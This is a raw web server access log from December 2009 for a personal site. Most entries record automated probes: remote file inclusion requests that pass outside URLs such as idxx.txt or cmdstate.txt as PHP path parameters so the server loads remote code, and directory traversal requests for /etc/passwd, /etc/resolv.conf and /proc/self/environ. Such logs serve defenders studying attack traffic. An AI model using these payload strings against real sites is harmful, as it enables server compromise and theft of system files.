85.158.176.210 - - [13/Dec/2009:11:44:37 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:44:37 -0800] "GET /logs/access_081201.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:44:42 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:44:42 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:44:42 -0800] "GET /logs/access_081201.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:44:48 -0800] "GET /logs/access_080416.log/popup.php?path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:04 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:04 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:05 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:05 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:08 -0800] "GET /logs/access_081029.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:08 -0800] "GET /logs/access_081201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:09 -0800] "GET /logs/access_081029.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:09 -0800] "GET /logs/access_081201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:11 -0800] "GET /logs/access_081124.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:45:17 -0800] "GET /logs/access_081124.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:45:41 -0800] "GET /logs/access_091119.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:47:08 -0800] "GET /logs/index.php?basepath=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:47:09 -0800] "GET /logs/access_080531.log/index.php?basepath=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:47:11 -0800] "GET /index.php?basepath=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 200 14809 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:47:21 -0800] "GET /logs/access_080119.log/index.php?basepath=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:47:48 -0800] "GET /logs/access_081029.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:47:48 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:47:48 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:47:48 -0800] "GET /logs/access_081201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:47:49 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:47:49 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:47:49 -0800] "GET /logs/access_081029.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:47:49 -0800] "GET /logs/access_081201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:48:51 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:48:51 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:49:02 -0800] "GET /logs/access_090510.log/magazine.html.php?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:49:03 -0800] "GET /logs/access_090223.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:49:03 -0800] "GET /logs/access_080912.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:49:03 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 130075 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:49:04 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 14922 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:49:07 -0800] "GET /logs/access_090223.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:49:07 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:49:07 -0800] "GET /logs/access_080912.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:49:08 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 130075 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:49:15 -0800] "GET /logs/access_090511.log/magazine.html.php?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:49:19 -0800] "GET /logs/access_080531.log%20%20/index.php?basepath=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:49:31 -0800] "GET /logs/access_080119.log%20%20/index.php?basepath=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:50:25 -0800] "GET /logs/access_091124.log/koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:50:49 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:50:49 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:51:45 -0800] "GET /logs/access_091119.log/koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:52:06 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:52:07 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:52:17 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:52:17 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:52:17 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:52:17 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:53:53 -0800] "GET /logs/access_090223.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:53:53 -0800] "GET /logs/access_080912.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:56:13 -0800] "GET /logs/access_090223.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:56:13 -0800] "GET /logs/access_080912.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:56:41 -0800] "GET /koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:56:41 -0800] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:56:41 -0800] "GET /logs/access_091124.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:56:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:56:46 -0800] "GET /logs/scriptsold.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:56:46 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
155.130.107.20 - - [13/Dec/2009:11:56:52 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; WinNT-PAI 16.08.2009)" "www.dmulk.com"
155.130.107.20 - - [13/Dec/2009:11:56:52 -0800] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; WinNT-PAI 16.08.2009)" "www.dmulk.com"
155.130.107.20 - - [13/Dec/2009:11:56:53 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; WinNT-PAI 16.08.2009)" "www.dmulk.com"
155.130.107.20 - - [13/Dec/2009:11:56:53 -0800] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 200 287373 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; WinNT-PAI 16.08.2009)" "www.dmulk.com"
155.130.107.20 - - [13/Dec/2009:11:56:55 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; WinNT-PAI 16.08.2009)" "www.dmulk.com"
155.130.107.20 - - [13/Dec/2009:11:56:57 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.0" 200 216057 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FBSMTWB; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; WinNT-PAI 16.08.2009)" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:59:13 -0800] "GET /logs/access_091127.log/index.php?basepath=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:59:44 -0800] "GET /logs/access_090506.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:59:44 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [13/Dec/2009:11:59:47 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:59:48 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:59:54 -0800] "GET /logs/access_090408.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:12:00:01 -0800] "GET /logs/access_091119.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:12:00:27 -0800] "GET /logs/access_081112.log//index.php?menu=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:12:00:27 -0800] "GET /logs/access_081112.log//index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:12:00:27 -0800] "GET /logs/access_081112.log//index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:12:00:27 -0800] "GET /logs/access_081112.log/errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:12:00:27 -0800] "GET /index.php?menu=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 200 14801 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:12:00:28 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 14890 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:12:00:29 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 14887 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
64.27.62.122 - - [13/Dec/2009:12:00:29 -0800] "GET /errors.php?error=http://www.teshilov.ru//cmdstate.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:12:00:34 -0800] "GET ///appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:12:00:34 -0800] "GET /logs////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:12:00:34 -0800] "GET /logs/access_090109.log////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:00:55 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:00:55 -0800] "GET /logs/access_090616.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:00:55 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:12:01:20 -0800] "GET ///appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:12:01:20 -0800] "GET /logs////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:12:01:20 -0800] "GET /logs/access_090109.log////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:12:01:55 -0800] "GET /logs/access_081005.log////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:12:02:02 -0800] "GET /index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 14925 "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:12:02:03 -0800] "GET /index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 14928 "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:12:02:04 -0800] "GET /index.php?option=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 14921 "-" "-" "www.dmulk.com"
69.42.146.14 - - [13/Dec/2009:12:02:18 -0800] "GET /logs/access_081202.log//index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.146.14 - - [13/Dec/2009:12:02:19 -0800] "GET /index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14835 "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.146.14 - - [13/Dec/2009:12:02:19 -0800] "GET /logs//index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.146.14 - - [13/Dec/2009:12:02:20 -0800] "GET /logs/access_081202.log//index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.146.14 - - [13/Dec/2009:12:02:21 -0800] "GET /index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14835 "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.146.14 - - [13/Dec/2009:12:02:21 -0800] "GET /logs//index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:02:30 -0800] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:02:30 -0800] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:02:30 -0800] "GET /logs/access_080317.log%20%20/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
